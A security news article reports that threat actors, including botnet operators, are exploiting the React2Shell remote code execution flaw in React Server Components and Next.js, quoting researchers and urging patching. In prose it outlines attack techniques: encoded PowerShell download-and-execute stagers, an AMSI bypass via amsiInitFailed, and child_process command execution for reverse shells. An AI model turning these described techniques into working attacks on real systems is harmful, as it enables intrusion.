UPDATE--A wide variety of threat actors are targeting the recently disclosed React2Shell CVE-2025-55182 vulnerability in React Server Components and Next.js, with both opportunistic cybercriminals and more deliberate APT groups involved in the exploitation campaigns. 

The vulnerability was disclosed publicly on Dec. 3 and researchers and threat intelligence teams immediately began seeing opportunistic and targeted exploitation attempts hitting organizations around the world. There are multiple public PoC exploits available, some of which researchers say are invalid. But the attack activity ramped up in recent days, and data from the Shadowserver Foundation shows hundreds of compromised hosts around the world. Censys data reveals more than 250,000 hosts exposed to the internet that are running vulnerable versions of these libraries. 

GreyNoise, which monitors exploit activity across the internet, is also tracking some attackers that are adding exploits for React2Shell to Mirai botnets. 

“Our traffic shows a familiar modern pattern, with attackers using a mix of fresh and legacy infrastructure to orchestrate their campaigns. The HTTP client and TCP stack fingerprints are overwhelmingly automation-heavy, not organic browsing. There's also an early focus on just this vulnerability, but we've already detected a slow migration of this CVE being added to Mirai and other botnet exploitation kits,” Bob Rudis of GreyNoise said in an analysis of the exploit activity.

“The initial access attempts are using the publicly disclosed proof-of-concept code as a base, and stage-1 payloads performing proof-of-execution (PoE) probes (e.g., PowerShell arithmetic) to validate RCE cheaply and using coded PowerShell download-and-execute stagers (-enc + DownloadString + IEX). Then, a stage-2 payload that uses reflection to set System.Management.Automation.AmsiUtils.amsiInitFailed = true (standard AMSI bypass), then iex executes the next stage.”

The React2Shell vulnerability is a critical RCE flaw in many versions of both React Server Components and Next that is trivially exploitable. The flaw has broader effects on downstream libraries and apps that implement RSC, as well. 

“This matters operationally because RSC is a high-value target since it sits in front of application logic that often runs with production permissions. Thanks to services such as BuiltWith/Wappalyzer, the exposed services are easy to find and exploit at scale. Early waves tend to be broad and shallow, featuring opportunistic scanning, validation payloads, and commodity post-exploitation stagers,” GreyNoise’s Rudis said.

It's interesting to note that much of the attack activity in the immediate aftermath of the disclosure was relatively basic and simple for organizations to identify. That's evolved somewhat, and there are now many more PoCs available and some different payloads, as well. VulnCheck researchers have identified several different payloads and attack paths used in recent days, and also have released their own artifacts, including a webshell and exploit information.

"Initial execution-based exploits are the simplest and were the most common immediately following the publication of the first valid PoCs. These often had a similar structure to the maple3142 PoC in that they simply call the NodeJS process and require modules to directly access child_process or similar OS command execution payloads. These can be used to call reverse shells or reach simple OS command sinks that are extremely common in logic exploitation bugs," Cale Black of VulnCheck said in a post.

Fixed versions of RSC and Next.js are available to address the vulnerability. Organizations that haven’t already deployed patched versions should do so as quickly as possible, especially in light of the widespread exploit activity.

This story was updated on Dec. 9 to include information from VulnCheck.

  • Recent Posts

  • Recent Comments

    No comments to show.